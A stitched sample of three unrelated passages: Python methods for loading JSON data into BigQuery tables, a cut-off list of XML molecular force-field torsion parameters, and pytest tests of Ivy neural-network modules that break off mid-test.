write_disposition (string): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY.
"""
if schema_path != '':
self.initiate_table(
table_id=table_id,
schema_path=schema_path,
dataset_id=dataset_id,
project_id=project_id
)
schema = read_table_schema_from_file(schema_path)
else:
schema = None
if self.table_exists(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
):
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
job_config = bigquery.LoadJobConfig(schema=schema)
job_config.source_format = bigquery.SourceFormat.NEWLINE_DELIMITED_JSON
job_config.write_disposition = set_write_disposition(write_disposition)
with open(file, mode='rb') as data:
job = self.client.load_table_from_file(
file_obj=data,
destination=table_ref,
location='US',
job_config=job_config
)
job.result()
else:
raise Exception("Please initiate %s:%s.%s or pass the schema file",project_id ,dataset_id, table_id)
def load_json_data(self, json, table_id, dataset_id=bq_default_dataset(),project_id=bq_default_project(), schema_path='', write_disposition="WRITE_TRUNCATE"):
""" Loads JSON data to BigQuery table.
Parameters:
json (string): JSON data.
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file.
write_disposition (string): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY.
"""
if schema_path != '':
self.initiate_table(
table_id=table_id,
schema_path=schema_path,
dataset_id=dataset_id,
project_id=project_id
)
schema = read_table_schema_from_file(schema_path)
else:
schema = None
if self.table_exists(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
):
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
job_config = bigquery.LoadJobConfig(schema=schema)
job_config.write_disposition = set_write_disposition(write_disposition)
job = self.client.load_table_from_json(
json_rows=json,
destination=table_ref,
location='US',
job_config=job_config
)
job.result()
| |
k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C135" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="C224" k1="-2.28028" k2="1.48532" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="C283" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="C293" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224I" type4="C235" k1="10.48092" k2="-0.39748" k3="2.07108" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224" type4="C235" k1="-3.64008" k2="-0.23012" k3="0.06276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224I" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224" type4="N238" k1="7.97052" k2="-1.1506" k3="1.65268" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224I" type4="N238" k1="15.71092" k2="-1.23428" k3="-0.43932" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C283" type4="C271" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C283" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C283" type4="N238" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C293" type4="C235" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C293" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C293" type4="N287" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C224S" type4="C235" k1="-8.09604" k2="6.52704" k3="-0.1046" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C224S" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C224S" type4="N238" k1="-6.98728" k2="2.46856" k3="-3.59824" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C283" type4="C271" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C283" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C283" type4="N238" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C293" type4="C235" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C293" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C293" type4="N287" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="O154" type4="H155" k1="0.43932" k2="-2.53132" k3="0.85772" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C235" type4="N238" k1="-0.58576" k2="-0.71128" k3="-0.54392" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C235" type4="N239" k1="-0.54392" k2="-0.66944" k3="-0.50208" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C235" type4="O236" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C267" type4="O268" k1="2.092" k2="1.142232" k3="0.9414" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C267" type4="O269" k1="0" k2="1.142232" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="N238" type4="C235" k1="-0.79496" k2="-0.35564" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="N238" type4="H241" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C223" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224A" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224S" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224K" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224Y" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="H241" k1="0" k2="10.2508" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N239" type4="C245" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N239" type4="C246" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C283" type3="C271" type4="O272" k1="0" k2="1.71544" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C283" type3="N238" type4="C235" k1="-1.426744" k2="0.27196" k3="0.707096" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C283" type3="N238" type4="H241" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="C235" type4="N238" k1="3.721668" k2="0.876548" k3="-0.23012" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="C235" type4="N239" k1="3.721668" k2="0.876548" k3="-0.23012" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="C235" type4="O236" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="N287" type4="H290" k1="0" k2="0" k3="0.725924" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C224K" k1="-5.23" k2="-1.00416" k3="0.79496" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C267" type2="C136" type3="C136" type4="C224" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C283" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C292" k1="-5.23" k2="-1.00416" k3="0.79496" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C293" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C267" type2="C136" type3="C136" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224" type4="C235" k1="-3.38904" k2="0.50208" k3="0.16736" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224K" type4="C235" k1="-4.184" k2="-0.4184" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224K" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224" type4="N238" k1="4.45596" k2="-0.77404" k3="3.30536" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224K" type4="N238" k1="0.1046" k2="-0.27196" k3="1.82004" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C235" type4="N237" k1="5.949648" k2="-0.755212" k3="-0.6799" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C235" type4="O236" k1="0.849352" k2="2.727968" k3="0.290788" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C245" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C245" type4="N239" k1="1.76774" k2="-2.012504" k3="1.491596" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C246" type4="C235" k1="1.10876" k2="0.71128" k3="0.25104" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C246" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C246" type4="N239" k1="-4.35136" k2="-1.3598" k3="1.21336" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C267" type4="O268" k1="2.092" k2="1.142232" k3="0.9414" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C267" type4="O269" k1="0" k2="1.142232" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C283" type4="C271" k1="-4.932936" k2="1.905812" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C283" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C283" type4="N238" k1="1.849328" k2="1.876524" k3="1.84096" k4="0.0" periodicity1="1" | |
<gh_stars>0
"""
Collection of tests for Ivy modules
"""
# global
import pytest
import numpy as np
# local
import ivy
import ivy_tests.helpers as helpers
class TrainableModule(ivy.Module):
def __init__(self, in_size, out_size, dev=None, hidden_size=64, v=None, with_partial_v=False):
self._linear0 = ivy.Linear(in_size, hidden_size, dev=dev)
self._linear1 = ivy.Linear(hidden_size, hidden_size, dev=dev)
self._linear2 = ivy.Linear(hidden_size, out_size, dev=dev)
ivy.Module.__init__(self, dev, v=v, with_partial_v=with_partial_v)
def _forward(self, x):
x = ivy.expand_dims(x, 0)
x = ivy.tanh(self._linear0(x))
x = ivy.tanh(self._linear1(x))
return ivy.tanh(self._linear2(x))[0]
# module training
@pytest.mark.parametrize(
"bs_ic_oc", [([1, 2], 4, 5)])
def test_module_training(bs_ic_oc, dev, compile_graph, call):
# smoke test
if call is helpers.np_call:
# NumPy does not support gradients
pytest.skip()
batch_shape, input_channels, output_channels = bs_ic_oc
x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
module = TrainableModule(input_channels, output_channels, dev=dev)
# compile if this mode is set
if compile_graph and call is helpers.torch_call:
# Currently only PyTorch is supported for ivy compilation
module.compile_graph(x)
def loss_fn(v_):
out = module(x, v=v_)
return ivy.reduce_mean(out)[0]
# train
loss_tm1 = 1e12
loss = None
grads = None
for i in range(10):
loss, grads = ivy.execute_with_gradients(loss_fn, module.v)
module.v = ivy.gradient_descent_update(module.v, grads, 1e-3)
assert loss < loss_tm1
loss_tm1 = loss
# type test
assert ivy.is_array(loss)
assert isinstance(grads, ivy.Container)
# cardinality test
if call is helpers.mx_call:
# mxnet slicing cannot reduce dimension to zero
assert loss.shape == (1,)
else:
assert loss.shape == ()
# value test
assert ivy.reduce_max(ivy.abs(grads.linear0.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.linear0.w)) > 0
assert ivy.reduce_max(ivy.abs(grads.linear1.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.linear1.w)) > 0
assert ivy.reduce_max(ivy.abs(grads.linear2.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.linear2.w)) > 0
# compilation test
if call is helpers.torch_call:
# pytest scripting does not support **kwargs
return
if not ivy.wrapped_mode():
helpers.assert_compilable(loss_fn)
class TrainableModuleWithList(ivy.Module):
def __init__(self, in_size, out_size, dev=None, hidden_size=64):
linear0 = ivy.Linear(in_size, hidden_size, dev=dev)
linear1 = ivy.Linear(hidden_size, hidden_size, dev=dev)
linear2 = ivy.Linear(hidden_size, out_size, dev=dev)
self._layers = [linear0, linear1, linear2]
ivy.Module.__init__(self, dev)
def _forward(self, x):
x = ivy.expand_dims(x, 0)
x = ivy.tanh(self._layers[0](x))
x = ivy.tanh(self._layers[1](x))
return ivy.tanh(self._layers[2](x))[0]
# module with list training
@pytest.mark.parametrize(
"bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_list_training(bs_ic_oc, dev, compile_graph, call):
# smoke test
if call is helpers.np_call:
# NumPy does not support gradients
pytest.skip()
batch_shape, input_channels, output_channels = bs_ic_oc
x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
module = TrainableModuleWithList(input_channels, output_channels, dev=dev)
# compile if this mode is set
if compile_graph and call is helpers.torch_call:
# Currently only PyTorch is supported for ivy compilation
module.compile_graph(x)
def loss_fn(v_):
out = module(x, v=v_)
return ivy.reduce_mean(out)[0]
# train
loss_tm1 = 1e12
loss = None
grads = None
for i in range(10):
loss, grads = ivy.execute_with_gradients(loss_fn, module.v)
module.v = ivy.gradient_descent_update(module.v, grads, 1e-3)
assert loss < loss_tm1
loss_tm1 = loss
# type test
assert ivy.is_array(loss)
assert isinstance(grads, ivy.Container)
# cardinality test
if call is helpers.mx_call:
# mxnet slicing cannot reduce dimension to zero
assert loss.shape == (1,)
else:
assert loss.shape == ()
# value test
assert ivy.reduce_max(ivy.abs(grads.layers.v0.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.v0.w)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.v1.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.v1.w)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.v2.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.v2.w)) > 0
# compilation test
if call is helpers.torch_call:
# pytest scripting does not support **kwargs
return
if not ivy.wrapped_mode():
helpers.assert_compilable(loss_fn)
# module with partial v
@pytest.mark.parametrize(
"bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_partial_v(bs_ic_oc, dev, compile_graph, call):
# smoke test
if call is helpers.np_call:
# NumPy does not support gradients
pytest.skip()
if call is helpers.mx_call:
# MXNet ivy.Container repr currently does not work
pytest.skip()
batch_shape, input_channels, output_channels = bs_ic_oc
x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
v = ivy.Container({
'linear0': {
'b': ivy.variable(ivy.random_uniform(shape=[64])),
'w': ivy.variable(ivy.random_uniform(shape=[64, 4]))
},
'linear1': {
'b': ivy.variable(ivy.random_uniform(shape=[64])),
'w': ivy.variable(ivy.random_uniform(shape=[64, 64])),
'extra': ivy.variable(ivy.random_uniform(shape=[64, 64]))
},
'linear2': {
'b': ivy.variable(ivy.random_uniform(shape=[5])),
'w': ivy.variable(ivy.random_uniform(shape=[5, 64]))
}
})
try:
TrainableModule(input_channels, output_channels, dev=dev, v=v, with_partial_v=True)
raise Exception('TrainableModule did not raise exception desipite being passed with wrongly shaped variables.')
except AssertionError:
pass
v = ivy.Container({
'linear0': {
'b': ivy.variable(ivy.random_uniform(shape=[64])),
},
'linear1': {
'w': ivy.variable(ivy.random_uniform(shape=[64, 64]))
},
'linear2': {
'b': ivy.variable(ivy.random_uniform(shape=[5]))
}
})
try:
TrainableModule(input_channels, output_channels, dev=dev, v=v)
raise Exception('TrainableModule did not raise exception desipite being passed with wrongly shaped variables.')
except AssertionError:
pass
module = TrainableModule(input_channels, output_channels, dev=dev, v=v, with_partial_v=True)
# compile if this mode is set
if compile_graph and call is helpers.torch_call:
# Currently only PyTorch is supported for ivy compilation
module.compile_graph(x)
module(x)
class ModuleWithNoneAttribute(ivy.Module):
def __init__(self, dev=None, hidden_size=64):
self.some_attribute = None
ivy.Module.__init__(self, dev)
def _forward(self, x):
return x
# module with none attribute
@pytest.mark.parametrize(
"bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_none_attribute(bs_ic_oc, dev, compile_graph, call):
# smoke test
if call is helpers.np_call:
# NumPy does not support gradients
pytest.skip()
batch_shape, input_channels, output_channels = bs_ic_oc
x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
module = ModuleWithNoneAttribute(dev=dev)
# compile if this mode is set
if compile_graph and call is helpers.torch_call:
# Currently only PyTorch is supported for ivy compilation
module.compile_graph(x)
module(x)
class TrainableModuleWithDuplicate(ivy.Module):
def __init__(self, channels, same_layer, dev=None):
if same_layer:
linear = ivy.Linear(channels, channels, dev=dev)
self._linear0 = linear
self._linear1 = linear
else:
w = ivy.variable(ivy.ones((channels, channels)))
b0 = ivy.variable(ivy.ones((channels,)))
b1 = ivy.variable(ivy.ones((channels,)))
v0 = ivy.Container({'w': w, 'b': b0})
v1 = ivy.Container({'w': w, 'b': b1})
self._linear0 = ivy.Linear(channels, channels, dev=dev, v=v0)
self._linear1 = ivy.Linear(channels, channels,dev=dev, v=v1)
ivy.Module.__init__(self)
def _forward(self, x):
x = self._linear0(x)
return self._linear1(x)
# module training with duplicate
@pytest.mark.parametrize(
"bs_c", [([1, 2], 64)])
@pytest.mark.parametrize(
"same_layer", [True, False])
def test_module_training_with_duplicate(bs_c, same_layer, dev, compile_graph, call):
# smoke test
if call is helpers.np_call:
# NumPy does not support gradients
pytest.skip()
batch_shape, channels = bs_c
x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), channels), 'float32')
module = TrainableModuleWithDuplicate(channels, same_layer, dev=dev)
# compile if this mode is set
if compile_graph and call is helpers.torch_call:
# Currently only PyTorch is supported for ivy compilation
